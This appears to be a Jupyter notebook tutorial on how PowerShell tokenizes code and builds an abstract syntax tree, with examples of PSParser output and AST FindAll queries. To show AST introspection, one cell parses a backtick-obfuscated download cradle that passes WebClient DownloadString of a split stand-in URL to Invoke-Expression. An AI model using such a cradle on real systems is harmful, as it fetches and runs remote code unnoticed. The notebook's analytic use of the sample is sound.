## The AST
PowerShell interprets text input by splitting it into _tokens_, based on words and delimiting symbols (quotes for example). These tokens are then arranged into an _abstract syntax tree_ - a sort of dynamic data structure that gives meaning to the tokens when considered as a whole. An AST allows for words to be identified as commands and words following commands as parameters to that command.

In [9]:
$code = { Get-Command -ParameterType String | Select-Object -First 10 }

# the PSParser is the old PowerShell parser, but it is still useful for examining how PowerShell performs tokenization
$tokens = [System.Management.Automation.PSParser]::Tokenize($code, [ref]$null)
$tokens[0..3]


[32;1mContent     : [0mGet-Command
[32;1mType        : [0mCommand
[32;1mStart       : [0m1
[32;1mLength      : [0m11
[32;1mStartLine   : [0m1
[32;1mStartColumn : [0m2
[32;1mEndLine     : [0m1
[32;1mEndColumn   : [0m13

[32;1mContent     : [0m-ParameterType
[32;1mType        : [0mCommandParameter
[32;1mStart       : [0m13
[32;1mLength      : [0m14
[32;1mStartLine   : [0m1
[32;1mStartColumn : [0m14
[32;1mEndLine     : [0m1
[32;1mEndColumn   : [0m28

[32;1mContent     : [0mString
[32;1mType        : [0mCommandArgument
[32;1mStart       : [0m28
[32;1mLength      : [0m6
[32;1mStartLine   : [0m1
[32;1mStartColumn : [0m29
[32;1mEndLine     : [0m1
[32;1mEndColumn   : [0m35

[32;1mContent     : [0m|
[32;1mType        : [0mOperator
[32;1mStart       : [0m35
[32;1mLength      : [0m1
[32;1mStartLine   : [0m1
[32;1mStartColumn : [0m36
[32;1mEndLine     : [0m1
[32;1mEndColumn   : [0m37



The AST of a scriptblock is itself an object of the type AST, with components of the AST being sub-objects of types that inherit from the AST class. For example, CommandAST objects contain the command sections of the AST.

In [None]:
#  The PowerShell AST parser can be called directly on a piece of code, and the resulting AST structure can be examined
$code = { Get-Command -ParameterType String | Select-Object -First 10 }
# the FindAll() method of the AST class takes a function which it uses to match against objects in the AST
"===== Commands ====="
$code.AST.FindAll({$args[0] -is [System.Management.Automation.Language.CommandAst]},1)
"===== Parameters ====="
$code.AST.FindAll({$args[0] -is [System.Management.Automation.Language.CommandParameterAst]},1)

The power of the AST comes in how it enabled deep introspection of PowerShell code. For example, pulling the cmdlets out of this obfuscated string:

In [8]:
$code = {
    Invoke-Expression (& (`G`C`M *w-O*) "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"( 'ht'+'tps://' + 'bit.ly/sample')
}
$AST = [System.Management.Automation.Language.Parser]::ParseInput($code, [ref]$null, [ref]$null)
$AST.FindAll(
    { $args[0] -is [System.Management.Automation.Language.CommandAst] }, $true) | ForEach {
    $_.CommandElements
} | Format-Table -AutoSize


[32;1mStringConstantType[0m[32;1m Value            [0m[32;1m StaticType   [0m[32;1m Extent[0m
[32;1m------------------[0m [32;1m-----            [0m [32;1m----------   [0m [32;1m------                                          [0m
          BareWord Invoke-Expression System.String Invoke-Expression                               
                                     System.Object (& (`G`C`M *w-O*) "`N`e`T`.`W`e`B`C`l`i`e`N`T")â€¦
                                     System.Object (`G`C`M *w-O*)                                  
      DoubleQuoted NT.WBCliNT    [0m System.String "`N`e`T`.`W`e`B`C`l`i`e`N`T"                    
          BareWord GCM               System.String `G`C`M                                          
          BareWord *w-O*             System.String *w-O*                                           



Although realistically, this is better achieved by reviewing PowerShells scriptblock logs. A more practical example use case is using the AST to retrieve all the function definitions within a script:

In [15]:
$code = {
    function TestFunc {
        param(
            [Parameter(Mandatory = $true, Position = 1, HelpMessage = "The message to write")]
            [string]$Message
        )

        process {
            Write-Host "Message: $message"
        }
    }
}
$AST = [System.Management.Automation.Language.Parser]::ParseInput($code, [ref]$null, [ref]$null)
$AST.FindAll({$args[0] -is [System.Management.Automation.Language.FunctionDefinitionAst]}, $true) | 
    Select Name, Body | Format-List


[32;1mName : [0mTestFunc
[32;1mBody : [0m{
               param(
                   [Parameter(Mandatory = $true, Position = 1, HelpMessage = "The message to 
       write")]
                   [string]$Message
               )
       
               process {
                   Write-Host "Message: $message"
               }
           }

